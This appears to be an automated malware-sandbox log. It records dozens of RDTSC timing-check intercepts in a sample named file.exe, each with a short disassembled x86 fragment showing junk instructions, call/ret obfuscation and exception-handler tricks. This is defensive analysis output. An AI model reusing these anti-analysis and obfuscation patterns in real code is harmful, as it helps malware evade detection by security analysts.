Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECE18 second address: 4ECE22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF06F second address: 4EF09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE451FC07Eh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FBE451FC07Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBE451FC07Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF5AD second address: 4EF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF5B3 second address: 4EF5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF636 second address: 4EF647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF7B7 second address: 4EF7BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F018E second address: 4F01A2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F01A2 second address: 4F01A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F01A8 second address: 4F01AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F031E second address: 4F0335 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE451FC078h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FBE451FC084h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0335 second address: 4F0339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1FB5 second address: 4F1FBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2911 second address: 4F2915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2915 second address: 4F2930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2930 second address: 4F298B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FBE44B74B69h 0x0000000e push 00000000h 0x00000010 mov esi, dword ptr [ebp+122D1E37h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FBE44B74B58h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2A35h], edx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c jng 00007FBE44B74B56h 0x00000042 pop edi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3B35 second address: 4F3B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3185 second address: 4F31A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F450D second address: 4F4517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBE451FC076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F506A second address: 4F5070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5070 second address: 4F5075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5075 second address: 4F5086 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007FBE44B74B56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9615 second address: 4F9619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9B60 second address: 4F9B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9B64 second address: 4F9B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBA94 second address: 4FBAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 sbb di, 07E1h 0x0000000b add ebx, 661455F0h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D2D3Bh] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FBE44B74B58h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 call 00007FBE44B74B68h 0x0000003a ja 00007FBE44B74B5Bh 0x00000040 pop ebx 0x00000041 xchg eax, esi 0x00000042 push edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 pop eax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9D0A second address: 4F9D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FADAC second address: 4FADB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9D10 second address: 4F9D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FADB2 second address: 4FADB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEDB5 second address: 4FEDB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FADB8 second address: 4FADBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEDB9 second address: 4FEDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC9EF second address: 4ACA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBE44B74B56h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF2F0 second address: 4FF36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC083h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FBE451FC078h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D3BA6h], edi 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 mov bx, 81FAh 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FBE451FC078h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 mov dword ptr [ebp+1245201Ch], edx 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jc 00007FBE451FC078h 0x00000060 push edi 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501120 second address: 50113C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5003D7 second address: 5003E1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501304 second address: 501308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50220D second address: 50227E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBE451FC07Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FBE451FC082h 0x00000011 jne 00007FBE451FC07Ch 0x00000017 nop 0x00000018 mov ebx, edx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 adc bh, FFFFFFB1h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov eax, dword ptr [ebp+122D0CB5h] 0x00000031 push edx 0x00000032 pop edi 0x00000033 push FFFFFFFFh 0x00000035 jmp 00007FBE451FC087h 0x0000003a nop 0x0000003b jmp 00007FBE451FC07Eh 0x00000040 push eax 0x00000041 push esi 0x00000042 jno 00007FBE451FC07Ch 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503037 second address: 503041 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50406C second address: 5040DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBE451FC076h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FBE451FC078h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D1D5Eh] 0x00000030 movzx ebx, cx 0x00000033 clc 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FBE451FC078h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 jnc 00007FBE451FC07Ch 0x00000058 pop eax 0x00000059 push eax 0x0000005a pushad 0x0000005b jnc 00007FBE451FC078h 0x00000061 pushad 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50514E second address: 505152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505152 second address: 50515E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5031CF second address: 5031D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507006 second address: 50700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A77BC second address: 4A77C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507843 second address: 507847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A450 second address: 50A456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B373 second address: 50B377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B377 second address: 50B380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B380 second address: 50B3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FBE451FC085h 0x0000000e nop 0x0000000f mov di, ax 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D1865h], edi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FBE451FC078h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push eax 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a jbe 00007FBE451FC076h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B3D7 second address: 50B3DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51278D second address: 51279C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC07Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51279C second address: 5127A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44B74B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 511E60 second address: 511E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51758D second address: 517591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517591 second address: 5175AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE451FC080h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5175AF second address: 5175B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518DF3 second address: 518DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518DF7 second address: 518DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518F18 second address: 518F1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518F1E second address: 518F23 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518F23 second address: 518F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FBE451FC084h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518F49 second address: 33FC77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b je 00007FBE44B74B5Eh 0x00000011 push edx 0x00000012 jc 00007FBE44B74B56h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jmp 00007FBE44B74B65h 0x00000022 pop eax 0x00000023 cld 0x00000024 push dword ptr [ebp+122D0C89h] 0x0000002a pushad 0x0000002b jmp 00007FBE44B74B61h 0x00000030 jmp 00007FBE44B74B65h 0x00000035 popad 0x00000036 call dword ptr [ebp+122D1E9Dh] 0x0000003c pushad 0x0000003d cld 0x0000003e xor eax, eax 0x00000040 jns 00007FBE44B74B5Ch 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a sub dword ptr [ebp+122D3892h], ecx 0x00000050 mov dword ptr [ebp+122D2D8Fh], eax 0x00000056 stc 0x00000057 mov esi, 0000003Ch 0x0000005c jns 00007FBE44B74B5Ch 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 je 00007FBE44B74B6Fh 0x0000006c jmp 00007FBE44B74B69h 0x00000071 lodsw 0x00000073 xor dword ptr [ebp+122D3892h], edi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jc 00007FBE44B74B5Ch 0x00000083 mov dword ptr [ebp+122D3892h], edi 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jmp 00007FBE44B74B65h 0x00000092 sub dword ptr [ebp+122D1807h], ecx 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b push eax 0x0000009c push edx 0x0000009d jno 00007FBE44B74B56h 0x000000a3 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51EADB second address: 51EAE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6BA0 second address: 4B6BAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FBE44B74B58h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6BAE second address: 4B6BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC081h 0x00000007 pushad 0x00000008 jmp 00007FBE451FC083h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E645 second address: 51E65A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B61h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E7AB second address: 51E7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FBE451FC07Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E7BE second address: 51E7D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE44B74B5Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E7D7 second address: 51E7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E969 second address: 51E971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523E15 second address: 523E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523E1B second address: 523E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523E1F second address: 523E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5239F1 second address: 5239F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5239F5 second address: 5239FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5247A5 second address: 5247AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5247AA second address: 5247C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE451FC085h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5247C5 second address: 5247E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FBE44B74B56h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52495E second address: 5249D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC07Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBE451FC07Bh 0x0000000e pushad 0x0000000f jmp 00007FBE451FC084h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jg 00007FBE451FC076h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 jno 00007FBE451FC076h 0x00000028 push eax 0x00000029 pop eax 0x0000002a jmp 00007FBE451FC087h 0x0000002f popad 0x00000030 jmp 00007FBE451FC083h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5281F7 second address: 52820B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52820B second address: 52822D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52822D second address: 528231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528231 second address: 528235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528235 second address: 52823B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AEDA second address: 52AEDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AEDF second address: 52AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
